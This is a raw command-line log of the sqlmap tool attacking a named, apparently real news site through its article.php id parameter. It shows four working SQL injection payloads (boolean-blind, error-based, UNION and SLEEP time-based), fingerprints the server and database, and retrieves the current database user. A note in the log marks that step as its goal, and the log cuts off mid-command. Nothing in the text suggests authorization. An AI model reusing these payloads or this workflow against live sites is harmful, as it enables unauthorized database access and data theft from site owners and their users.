D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user
/* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
[*] starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/arti